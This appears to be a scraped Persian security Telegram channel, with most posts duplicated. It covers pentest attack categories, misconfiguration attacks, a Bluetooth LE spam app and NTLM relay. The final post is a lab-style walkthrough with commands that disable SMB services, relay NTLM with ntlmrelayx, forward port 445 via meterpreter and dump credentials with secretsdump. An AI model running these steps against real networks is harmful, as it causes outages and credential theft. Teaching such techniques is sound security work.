Try Hack Box
Photo
حملات قانونمند
هكرهای قانونمند، در طول شبيه سازي حمله يا تست نفوذ، از روشهاي زيادی بر ای به خطر انداختن امنيت سازمان استفاده ميكنند. مهمترين روشها عبارتند از :
شبكه راه دور remote :(در اين حمله سعي ميشود كه حمله از طريق اينترنت شبيه سازي شود. هكر قانونمند، تلاش ميكند تا در دستگاههاي دفاعي شبكه از قبيل فايروال، پروكسي، يا روتر آسيب پذيري پيدا كند .
شبكه راه دور up-dial :در اين حمله سعي ميشود كه به مودمهاي مشتري حمله شود. dialing War ،فرآيند
تكرار تماس براي يافتن سيستم باز است .
شبكه محلی: اين حمله، شخصي را شبيه سازي ميكند كه دسترسي فيزيكي و غير مجاز به شبكه دارد. براي انجام
اين حمله، هكر قانونمند بايد به شبكه دسترسي مستقيم داشته باشد .
سرقت تجهيزات: در اين حمله، سرقت منابع اطلاعاتي مهم از قبيل لپ تاپهاي كارمندان، شبيه سازي ميشود. با سرقت لپ تاپ، اطلاعاتي همچون نام كاربري، پسوردها، تنظيمات امنيتي و انواع رمزگذاري بدست مي آید.
اجتماعي: اين حمله، كارمندان سازمان را با استفاده از تلفن يا ارتباطات رو در رو براي جمعآوري اطلاعات مورد نياز حمله، مورد ارزيابي قرار مي دنده . حملات مهندسي اجتماعي، براي بدست آوردن نامهاي كاربري، پسوردها، يا ديگر اطلاعات امنيتي سازماني استفاده مي شوند
ورود فيزیکی: اين حمله تلاش ميكند تا محيط فيزيكي سازمان را به خطر بياندازد. يعني با دسترسي فيزيكي به آن، ميتواند ويروسها،تروجانها،rootkitها يا logger keyهاي سختافزاري را بر روي سيستمهاي شبكه هدف نصب كند .
#Attack
@TryHackBox
هكرهای قانونمند، در طول شبيه سازي حمله يا تست نفوذ، از روشهاي زيادی بر ای به خطر انداختن امنيت سازمان استفاده ميكنند. مهمترين روشها عبارتند از :
شبكه راه دور remote :(در اين حمله سعي ميشود كه حمله از طريق اينترنت شبيه سازي شود. هكر قانونمند، تلاش ميكند تا در دستگاههاي دفاعي شبكه از قبيل فايروال، پروكسي، يا روتر آسيب پذيري پيدا كند .
شبكه راه دور up-dial :در اين حمله سعي ميشود كه به مودمهاي مشتري حمله شود. dialing War ،فرآيند
تكرار تماس براي يافتن سيستم باز است .
شبكه محلی: اين حمله، شخصي را شبيه سازي ميكند كه دسترسي فيزيكي و غير مجاز به شبكه دارد. براي انجام
اين حمله، هكر قانونمند بايد به شبكه دسترسي مستقيم داشته باشد .
سرقت تجهيزات: در اين حمله، سرقت منابع اطلاعاتي مهم از قبيل لپ تاپهاي كارمندان، شبيه سازي ميشود. با سرقت لپ تاپ، اطلاعاتي همچون نام كاربري، پسوردها، تنظيمات امنيتي و انواع رمزگذاري بدست مي آید.
اجتماعي: اين حمله، كارمندان سازمان را با استفاده از تلفن يا ارتباطات رو در رو براي جمعآوري اطلاعات مورد نياز حمله، مورد ارزيابي قرار مي دنده . حملات مهندسي اجتماعي، براي بدست آوردن نامهاي كاربري، پسوردها، يا ديگر اطلاعات امنيتي سازماني استفاده مي شوند
ورود فيزیکی: اين حمله تلاش ميكند تا محيط فيزيكي سازمان را به خطر بياندازد. يعني با دسترسي فيزيكي به آن، ميتواند ويروسها،تروجانها،rootkitها يا logger keyهاي سختافزاري را بر روي سيستمهاي شبكه هدف نصب كند .
#Attack
@TryHackBox
❤1
حملات ذر سطح برنامه های کاربردی ( Application level Attacks ) :
- امروزه برنامه های کاربردی با ویژیگی های بیشتر کد نویسی پیچیده تر منتشر می شود .
- با افزایش تقاضا برای ويژیگی های بیشتر توسعه دهندگان امنبت را نادیده میگیرند که این امر موجب بروز آسیب پذیری در برنامه میگردد .
- توسعه دهندگان برنامه باید آن را در بازه زمانی مشخصی ارایه دهند که خود باعث کاهش دفت در کدنویسی می گردد.
#Attack
@TryHackBox
- امروزه برنامه های کاربردی با ویژیگی های بیشتر کد نویسی پیچیده تر منتشر می شود .
- با افزایش تقاضا برای ويژیگی های بیشتر توسعه دهندگان امنبت را نادیده میگیرند که این امر موجب بروز آسیب پذیری در برنامه میگردد .
- توسعه دهندگان برنامه باید آن را در بازه زمانی مشخصی ارایه دهند که خود باعث کاهش دفت در کدنویسی می گردد.
#Attack
@TryHackBox
حملات در سطح کدهای برنامه نویسی ( Shrink Warp Code Attacks ):
- چرا باید چرخ را دوباره اختراع کنید زمانی که قبلا اختراع شده است ؟
- سیستم عامل ها و برنامه های کاربردی قابلیت پشتیبانی از اسکریپت ها را دارند .
- توسعه دهندگان برای کاهش زمان برنامه نویسی و هزینه از کدهای اماده استفاده میکنند.
- مشکل اینجاست که توسعه دهندگان این کدها را بهینه سازی نمیکنند .
#Attack
@TryHackBox
- چرا باید چرخ را دوباره اختراع کنید زمانی که قبلا اختراع شده است ؟
- سیستم عامل ها و برنامه های کاربردی قابلیت پشتیبانی از اسکریپت ها را دارند .
- توسعه دهندگان برای کاهش زمان برنامه نویسی و هزینه از کدهای اماده استفاده میکنند.
- مشکل اینجاست که توسعه دهندگان این کدها را بهینه سازی نمیکنند .
#Attack
@TryHackBox
حملات در موارد پیکربندی نادرست ( Misconfiguration Attacks ) :
- پیکربندی نادرست می تواند پایگاه داده برنامه های تحت وب سیستم عامل ها و بخش های دیگر را دچار اسیب پذیری نماید .
- پیکربندی نادرست میتواند موجب دسترسی غیرقانونی به اطلاعات شود .
- اگر یک سیستم به درستی پیکربندی نشود مانند عدم تعیین صحیح مجوزها دیگر امن نخواهد بود .
- دستگاه باید ابتدا به درستی پیگربندی شده و سپس وارد شبکه شود .
- پیکربندی پیش فرض عامل بسیاری از نفوذها به شبکه است .
به منظور بهینه سازی پیکربندی باید تمام نرم اقزارها و سرویس های اضاقی را حدف نمود.
#Attack
@TryHackBox
- پیکربندی نادرست می تواند پایگاه داده برنامه های تحت وب سیستم عامل ها و بخش های دیگر را دچار اسیب پذیری نماید .
- پیکربندی نادرست میتواند موجب دسترسی غیرقانونی به اطلاعات شود .
- اگر یک سیستم به درستی پیکربندی نشود مانند عدم تعیین صحیح مجوزها دیگر امن نخواهد بود .
- دستگاه باید ابتدا به درستی پیگربندی شده و سپس وارد شبکه شود .
- پیکربندی پیش فرض عامل بسیاری از نفوذها به شبکه است .
به منظور بهینه سازی پیکربندی باید تمام نرم اقزارها و سرویس های اضاقی را حدف نمود.
#Attack
@TryHackBox
طبقه بندی حملات
بر اساس IATF ، حملات امنیتی به پنج دسته تقسیم می شوند: منفعل ، فعال ، نزدیک ، خودی و توزیع.
#حملات
#Attack
@TryHackBox
بر اساس IATF ، حملات امنیتی به پنج دسته تقسیم می شوند: منفعل ، فعال ، نزدیک ، خودی و توزیع.
#حملات
#Attack
@TryHackBox
🖥 مخزن: بلوتوث LE هرزنامه - درخواست های هرزنامه
اپلیکیشن اندروید برای انجام حملات اسپم بلوتوث.
این برنامه میتواند درخواستهای اتصال کمانرژی بلوتوث را که خدمات جفتسازی سریع Google و Microsoft Swift Pairing را تقلید میکنند، جعل کند .
- این ممکن است منجر به هجوم پیامهای پاپ آپ ناخواسته شود.
#BlueTooth #Attack
https://github.com/simondankelmann/Bluetooth-LE-Spam
@TryHackBox
اپلیکیشن اندروید برای انجام حملات اسپم بلوتوث.
این برنامه میتواند درخواستهای اتصال کمانرژی بلوتوث را که خدمات جفتسازی سریع Google و Microsoft Swift Pairing را تقلید میکنند، جعل کند .
- این ممکن است منجر به هجوم پیامهای پاپ آپ ناخواسته شود.
#BlueTooth #Attack
https://github.com/simondankelmann/Bluetooth-LE-Spam
@TryHackBox
Attack Surface Management.pdf
333.4 KB
انتقال به فضای ابری، افزایش برنامه های نرم افزار به عنوان سرویس ( SaaS )و افزایش ناگهانی توانایی های کار از راه دور، سطح حمله بیشتر سازمان ها بزرگ تر و پیچیده تر شده است و تعریف ...
✍ تهیه شده توسط : تیم ترجمه TryHackBox
#Surface #attack
@TryHackBox
✍ تهیه شده توسط : تیم ترجمه TryHackBox
#Surface #attack
@TryHackBox
👌6🔥1
NTLM Relay Attack ?
خیلیها اسم حملات NTLM Relay رو شنیدن، اما مثل اغلب حملات دیگه، برای اجرا شدن نیاز به برآورده شدن شرایط مشخصی هست.
اغلب این حملات یا با کمک Responder انجام میشن که در این حالت کلید موفقیت وابسته به موفقیت Poisoning درخواست های Broadcast هست که بعضی پروتکل ها در شبکه های ویندوزی ازشون استفاده میکنن یا از مکانیزم Coerce (اجبار به احراز هویت) استفاده میشه.
در حالت اول ما باید دسترسی به همون شبکهای که «قربانی» توشه داشته باشیم، و در حالت دوم امکان relay حساب یک کامپیوتر دامینی رو بهدست مییاریم که باز هم همیشه نتیجهٔ دلخواه رو نمیده.
@TryHackBox
#NTLM #AD #Attack
خیلیها اسم حملات NTLM Relay رو شنیدن، اما مثل اغلب حملات دیگه، برای اجرا شدن نیاز به برآورده شدن شرایط مشخصی هست.
اغلب این حملات یا با کمک Responder انجام میشن که در این حالت کلید موفقیت وابسته به موفقیت Poisoning درخواست های Broadcast هست که بعضی پروتکل ها در شبکه های ویندوزی ازشون استفاده میکنن یا از مکانیزم Coerce (اجبار به احراز هویت) استفاده میشه.
در حالت اول ما باید دسترسی به همون شبکهای که «قربانی» توشه داشته باشیم، و در حالت دوم امکان relay حساب یک کامپیوتر دامینی رو بهدست مییاریم که باز هم همیشه نتیجهٔ دلخواه رو نمیده.
@TryHackBox
#NTLM #AD #Attack
🔥5
🔖 اصل قضیه: Remote NTLM Relay
⭕ امروز می خوام یک وکتور دیگه از NTLM Relay رو بررسی کنم. این وکتور به خاطر ویژگی های exploiting زیاد استفاده نشده، ولی دونستنش مفیده.
اینجا حرف از Remote NTLM Relay هست: حملهای که با متوقفسازی اجباری سرویس های SMB روی سرور و راهاندازی مجدد اون ها کار میکنه، بهطوری که ترافیک واردشون روی پورت 445 پس از ری استارت به ماشین مهاجم هدایت بشه. به این ترتیب مهاجم میتونه سشن های ورودی رو به هر جایی که میخواد رله کنه.
برای exploiting باید چند مرحله ساده رو انجام بدیم.
💢 مرحله 1 > آماده سازی سرور
برای آماده سازی سرور جهت exploiting، باید سرویس های SMB رو غیرفعال و سرور رو ری استارت کنیم. مراحل به صورت کلی اینه:
1. غیرفعالسازی NetLogon:
2. غیرفعال و متوقفکردن SMB Server (LanManServer):
3. توقف کامل LanManWorkstation:
این مراحل توی اسکرین شات اول قابل مشاهدهست.
بعد از غیرفعالسازی سرویسها باید ماشین رو ری استارت کنیم (
پس از بوت شدن مجدد و بهدست آوردن شل روی سرور (در این سناریو من از meterpreter استفاده کردم)، میتونیم به مرحله بعد بریم.
💢 مرحله 2 > تنظیم ماشین مهاجم
روی ماشین مهاجم برای رله کردن NTLM از اسکریپت ntlmrelayx.py از مجموعهٔ Impacket استفاده میکنیم. در مثالی که من اجرا کردم، هدف سرور
💢 مرحله 3 > TCP relay با meterpreter
با شلی که در مرحلهٔ اول گرفتیم، ترافیک ورودی به پورت
اگر همه چیز رو درست انجام بدیم، باید بتونیم یک سشن بگیریم و با موفقیت اون رو رله کنیم مثل چیزی که توی اسکرین شات سوم می بینید.
💢 مرحله 4 > Post-exploitation
بعد از اینکه رله موفق باشه،
در سناریوی من، کاربری که سشنش رله شد سطح بالایی از دسترسی ها روی ماشین تارگت داشت؛ بنابراین منطقیه از secretsdump.py برای استخراج اعتبارنامهها و lateral movement در دامنه استفاده کنیم:
چرا این وکتور کمتر رایجه؟
دلیل اینکه این وکتور خیلی گسترده نشده، ماهیت مخرب و تخریبی اون هست:
غیرفعالکردن سرویس های SMB روی یک سرور فعال باعث DoS و توقف سرویس میشه. در محیط های واقعی این عواقب میتونن مشکلات جدی ایجاد کنن بنابراین اجرای این حمله تنها باید با مجوز صریح (explicit authorization) از مشتری/مالک شبکه انجام بشه.
@TryHackBox
#AD #NTLM #Attack
⭕ امروز می خوام یک وکتور دیگه از NTLM Relay رو بررسی کنم. این وکتور به خاطر ویژگی های exploiting زیاد استفاده نشده، ولی دونستنش مفیده.
اینجا حرف از Remote NTLM Relay هست: حملهای که با متوقفسازی اجباری سرویس های SMB روی سرور و راهاندازی مجدد اون ها کار میکنه، بهطوری که ترافیک واردشون روی پورت 445 پس از ری استارت به ماشین مهاجم هدایت بشه. به این ترتیب مهاجم میتونه سشن های ورودی رو به هر جایی که میخواد رله کنه.
برای exploiting باید چند مرحله ساده رو انجام بدیم.
💢 مرحله 1 > آماده سازی سرور
برای آماده سازی سرور جهت exploiting، باید سرویس های SMB رو غیرفعال و سرور رو ری استارت کنیم. مراحل به صورت کلی اینه:
1. غیرفعالسازی NetLogon:
sc stop netlogon
2. غیرفعال و متوقفکردن SMB Server (LanManServer):
sc stop lanmanserver
sc config lanmanserver start= disabled
3. توقف کامل LanManWorkstation:
sc stop lanmanworkstation
sc config lanmanworkstation start= disabled
این مراحل توی اسکرین شات اول قابل مشاهدهست.
بعد از غیرفعالسازی سرویسها باید ماشین رو ری استارت کنیم (
shutdown /r /t 0) خیلی مهمه که دستگاه ری استارت بشه نه اینکه خاموش بشه.پس از بوت شدن مجدد و بهدست آوردن شل روی سرور (در این سناریو من از meterpreter استفاده کردم)، میتونیم به مرحله بعد بریم.
💢 مرحله 2 > تنظیم ماشین مهاجم
روی ماشین مهاجم برای رله کردن NTLM از اسکریپت ntlmrelayx.py از مجموعهٔ Impacket استفاده میکنیم. در مثالی که من اجرا کردم، هدف سرور
10.201.126.30 بود (چون برای این هدف SMB نیازی به signing نداشت). پراکسی ای که استفاده میکنیم روی پورت 1090 listening میکنه، بنابراین دستور اجرا شبیه اینه:proxychains impacket-ntlmrelayx -t smb://10.201.126.30 -smb2support -socks -socks-port 1090
💢 مرحله 3 > TCP relay با meterpreter
با شلی که در مرحلهٔ اول گرفتیم، ترافیک ورودی به پورت
445/TCP روی سرور رو به ماشین مهاجم (که رله رو انجام میده) فوروارد/ریدایرکت می کنیم. مثال دستور:portfwd add -R -L 10.51.124.39 -l 445 -p 445
اگر همه چیز رو درست انجام بدیم، باید بتونیم یک سشن بگیریم و با موفقیت اون رو رله کنیم مثل چیزی که توی اسکرین شات سوم می بینید.
💢 مرحله 4 > Post-exploitation
بعد از اینکه رله موفق باشه،
ntlmrelayx.py معمولاً سشن رو باز نگه میداره؛ بنابراین با ساخت یک کانفیگ سفارشی برای proxychains می تونیم از ابزارهای دیگهٔ Impacket-like برای کارهای post-exploitation استفاده کنیم.در سناریوی من، کاربری که سشنش رله شد سطح بالایی از دسترسی ها روی ماشین تارگت داشت؛ بنابراین منطقیه از secretsdump.py برای استخراج اعتبارنامهها و lateral movement در دامنه استفاده کنیم:
proxychains -f p4-ntlm-relay.conf impacket-secretsdump -no-pass HOLOLIVE/[email protected]
چرا این وکتور کمتر رایجه؟
دلیل اینکه این وکتور خیلی گسترده نشده، ماهیت مخرب و تخریبی اون هست:
غیرفعالکردن سرویس های SMB روی یک سرور فعال باعث DoS و توقف سرویس میشه. در محیط های واقعی این عواقب میتونن مشکلات جدی ایجاد کنن بنابراین اجرای این حمله تنها باید با مجوز صریح (explicit authorization) از مشتری/مالک شبکه انجام بشه.
@TryHackBox
#AD #NTLM #Attack
🔥4❤1